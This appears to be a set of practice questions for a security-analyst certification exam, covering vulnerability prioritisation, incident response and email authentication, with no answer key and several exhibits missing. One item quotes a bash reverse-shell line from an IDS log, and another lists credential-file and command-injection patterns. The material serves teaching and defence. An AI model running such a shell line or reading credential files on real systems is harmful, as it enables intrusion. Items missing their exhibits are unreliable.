A leader on the vulnerability management team is trying to reduce the team's workload by automating some simple but time-consuming tasks. Which of the following activities should the team leader consider first?

A. Assigning a custom recommendation for each finding

B. Analyzing false positives

C. Rendering an additional executive report

D. Regularly checking agent communication with the central console

A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective?

A. Upload the binary to an air gapped sandbox for analysis

B. Send the binaries to the antivirus vendor

C. Execute the binaries on an environment with internet connectivity

D. Query the file hashes using VirusTotal

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

A. Join an information sharing and analysis center specific to the company’s industry

B. Upload threat intelligence to the IPS in STIX’TAXII format

C. Add data enrichment for IPs in the ingestion pipeline

D. Review threat feeds after viewing the SIEM alert

An organization was compromised, and the usernames and passwords of all employees were leaked online. Which of the following best describes the remediation that could reduce the impact of this situation?

A. Multifactor authentication

B. Password changes

C. System hardening

D. Password encryption

A penetration tester submitted data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

A. Implementing multifactor authentication on the server OS

B. Hashing user passwords on the web application

C. Performing input validation before allowing submission

D. Segmenting the network between the users and the web server

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

A. To provide metrics and test continuity controls

B. To verify the roles of the incident response team

C. To provide recommendations for handling vulnerabilities

D. To perform tests against implemented security controls

A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue?

A. Credentialed scar

B. External scan

C. Differential scan

D. Network scan

Which of the following best describes the key elements of a successful information security program?

A. Business impact analysis, asset and change management, and security communication plan

B. Security policy implementation, assignment of roles and responsibilities, and information asset classification

C. Disaster recovery and business continuity planning, and the definition of access control requirements and human resource policies

D. Senior management organizational structure, message distribution standards, and procedures for the operation of security management systems

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

A. Wipe the computer and reinstall software

B. Shut down the email server and quarantine it from the network

C. Acquire a bit-level image of the affected workstation

D. Search for other mail users who have received the same file

A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

A. Nmap

B. TCPDump

C. SIEM

D. EDR

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R
Which of the following represents the exploit code maturity of this critical vulnerability?

A. E:U

B. S:C

C. RC:R

D. AV:N

E. AC:L

SIMULATION
-
A company recently experienced a security incident. The security team has determined a user clicked on a link embedded in a phishing email that was sent to the entire company. The link resulted in a malware download, which was subsequently installed and run.
INSTRUCTIONS
-
Part 1
-
Review the artifacts associated with the security Incident. Identify the name of the malware, the malicious IP address, and the date and time when the malware executable entered the organization.
Part 2
-
Review the kill chain items and select an appropriate control for each that would improve the security posture of the organization and would have helped to prevent this incident from occurring. Each control may only be used once, and not all controls will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
 

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

A. DLP

B. NAC

C. EDR

D. NIDS

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A. Develop a call tree to inform impacted users

B. Schedule a review with all teams to discuss what occurred

C. Create an executive summary to update company leadership

D. Review regulatory compliance with public relations for official notification

A security analyst observed the following activities in chronological order:
1.	Protocol violation alerts on external firewall
2.	Unauthorized internal scanning activity
3.	Changes in outbound network performance
Which of the following best describes the goal of the threat actor?

A. Data exfiltration

B. Unusual traffic spikes

C. Rogue devices

D. Irregular peer-to-peer communication

An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has:
•	created the initial evidence log.
•	disabled the wireless adapter on the device.
•	interviewed the employee, who was unable to identify the website that was accessed.
•	reviewed the web proxy traffic logs.
Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.

B. Install an additional malware scanner that will send email alerts to the analyst.

C. Configure the system to use a proxy server for Internet access.

D. Delete the user profile and restore data from backup.

Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

A. Risk register

B. Vulnerability assessment

C. Penetration test

D. Compliance report

Which of the following actions would an analyst most likely perform after an incident has been investigated?

A. Risk assessment

B. Root cause analysis

C. Incident response plan

D. Tabletop exercise

A security analyst is tasked with prioritizing vulnerabilities for remediation. The relevant company security policies are shown below:
Security Policy 1006: Vulnerability Management
1. The Company shall use the CVSSv3.1 Base Score Metrics (Exploitability and Impact) to prioritize the remediation of security vulnerabilities.
2. In situations where a choice must be made between confidentiality and availability, the Company shall prioritize confidentiality of data over availability of systems and data.
3. The Company shall prioritize patching of publicly available systems and services over patching of internally available system.
According to the security policy, which of the following vulnerabilities should be the highest priority to patch?

A. Name: THOR.HAMMER -CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HInternal System

B. Name: CAP.SHIELD -CVSS 3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NExternal System

C. Name: LOKI.DAGGER -CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HExternal System

D. Name: THANOS.GAUNTLET -CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:NInternal System

The security analyst received the monthly vulnerability report. The following findings were included in the report:
•	Five of the systems only required a reboot to finalize the patch application
•	Two of the servers are running outdated operating systems and cannot be patched
The analyst determines that the only way to ensure these servers cannot be compromised is to isolate them. Which of the following approaches will best minimize the risk of the outdated servers being compromised?

A. Compensating controls

B. Due diligence

C. Maintenance windows

D. Passive discovery

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

A. Mean time between failures

B. Mean time to detect

C. Mean time to remediate

D. Mean time to contain

Which of the following tools would work best to prevent the exposure of PII outside of an organization?

A. PAM

B. IDS

C. PKI

D. DLP

A vulnerability scanner generates the following output:
 
The company has an SLA for patching that requires time frames to be met for high-risk vulnerabilities. Which of the following should the analyst prioritize first for remediation?

A. Oracle JDK

B. Cisco Webex

C. Redis Server

D. SSL Self-signed Certificate

A security analyst is reviewing the findings of the latest vulnerability report for a company’s web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure?

A. Deploy a WAF to the front of the application.

B. Replace the current MD5 with SHA-256.

C. Deploy an antivirus application on the hosting system.

D. Replace the MD5 with digital signatures.

A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

A. Leave the proxy as is.

B. Decomission the proxy.

C. Migrate the proxy to the cloud.

D. Patch the proxy.

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

A. Offline storage

B. Evidence collection

C. Integrity validation

D. Legal hold

When starting an investigation, which of the following must be done first?

A. Notify law enforcement

B. Secure the scene

C. Seize all related evidence

D. Interview the witnesses

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

A. Set user account control protection to the most restrictive level on all devices

B. Implement MFA requirements for all internal resources

C. Harden systems by disabling or removing unnecessary services

D. Implement controls to block execution of untrusted applications

An MSSP received several alerts from customer 1, which caused a missed incident response deadline for customer 2. Which of the following best describes the document that was violated?

A. KPI

B. SLO

C. SLA

D. MOU

A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

A. /etc/shadow

B. curl localhost

C. ; printenv

D. cat /proc/self/

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

A. Perform OS hardening.

B. Implement input validation.

C. Update third-party dependencies.

D. Configure address space layout randomization.

A security analyst reviews the following Arachni scan results for a web application that stores PII data:
 
Which of the following should be remediated first?

A. SQL injection

B. RFI

C. XSS

D. Code injection

A vulnerability management team found four major vulnerabilities during an assessment and needs to provide a report for the proper prioritization for further mitigation. Which of the following vulnerabilities should have the highest priority for the mitigation process?

A. A vulnerability that has related threats and IoCs, targeting a different industry

B. A vulnerability that is related to a specific adversary campaign, with IoCs found in the SIEM

C. A vulnerability that has no adversaries using it or associated IoCs

D. A vulnerability that is related to an isolated system, with no IoCs

Which of the following can be used to learn more about TTPs used by cybercriminals?

A. ZenMAP

B. MITRE ATT&CK

C. National Institute of Standards and Technology

D. theHarvester

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

A. SLA

B. LOI

C. MOU

D. KPI

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A. Running regular penetration tests to identify and address new vulnerabilities.

B. Conducting regular security awareness training of employees to prevent social engineering attacks.

C. Deploying an additional layer of access controls to verify authorized individuals.

D. Implementing intrusion detection software to alert security teams of unauthorized access attempts

A security analyst identified the following suspicious entry on the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A. #!/bin/bashnc 10.1.2.3 8080 -vv >dev/null && echo “Malicious activity” || echo “OK”

B. #!/bin/bashps -fea | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

C. #!/bin/bashls /opt/tcp/10.1.2.3/8080 >dev/null && echo “Malicious activity” || echo “OK”

D. #!/bin/bashnetstat -antp | grep 8080 >dev/null && echo “Malicious activity” || echo “OK”

A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user's workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies?

A. Create a timeline of events detailing the date stamps, user account hostname and IP information associated with the activities

B. Ensure that the case details do not reflect any user-identifiable information Password protect the evidence and restrict access to personnel related to the investigation

C. Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation

D. Notify the SOC manager for awareness after confirmation that the activity was intentional

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?

A. Passive network footprinting

B. OS fingerprinting

C. Service port identification

D. Application versioning

A security analyst performs a vulnerability scan. Based on the metrics from the scan results, the analyst must prioritize which hosts to patch. The analyst runs the tool and receives the following output:
 
Which of the following hosts should be patched first, based on the metrics?

A. host01

B. host02

C. host03

D. host04

A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?

A. Cross-reference the signature with open-source threat intelligence.

B. Configure the EDR to perform a full scan.

C. Transfer the malware to a sandbox environment.

D. Log in to the affected systems and run netstat.

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A. Impact

B. Vulnerability score

C. Mean time to detect

D. Isolation

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).

A. Drop the tables on the database server to prevent data exfiltration.

B. Deploy EDR on the web server and the database server to reduce the adversary’s capabilities.

C. Stop the httpd service on the web server so that the adversary can not use web exploits.

D. Use microsegmentation to restrict connectivity to/from the web and database servers.

E. Comment out the HTTP account in the /etc/passwd file of the web server.

F. Move the database from the database server to the web server.

An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

A. DKIM

B. SPF

C. SMTP

D. DMARC

An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

A. Disable the user’s network account and access to web resources.

B. Make a copy of the files as a backup on the server.

C. Place a legal hold on the device and the user’s network share.

D. Make a forensic image of the device and create a SHA-1 hash.

Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

A. Log retention

B. Log rotation

C. Maximum log size

D. Threshold value

A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script:
 
Which of the following scripting languages was used in the script?

A. PowerShell

B. Ruby

C. Python

D. Shell script

A security analyst received an alert regarding multiple successful MFA log-ins for a particular user. When reviewing the authentication logs, the analyst sees the following:
 
Which of the following are most likely occurring, base on the MFA logs? (Choose two.)

A. Dictionary attack

B. Push phishing

C. Impossible geo-velocity

D. Subscriber identity module swapping

E. Rogue access point

F. Password spray

A Chief Information Security Officer wants to implement security by design, starting with the implementation of a security scanning method to identify vulnerabilities, including SQL injection, RFI, XSS, etc. Which of the following would most likely meet the requirement?

A. Reverse engineering

B. Known environment testing

C. Dynamic application security testing

D. Code debugging

The email system administrator for an organization configured DKIM signing for all email legitimately sent by the organization. Which of the following would most likely indicate an email is malicious if the company's domain name is used as both the sender and the recipient?

A. The message fails a DMARC check

B. The sending IP address is the hosting provider

C. The signature does not meet corporate standards

D. The sender and reply address are different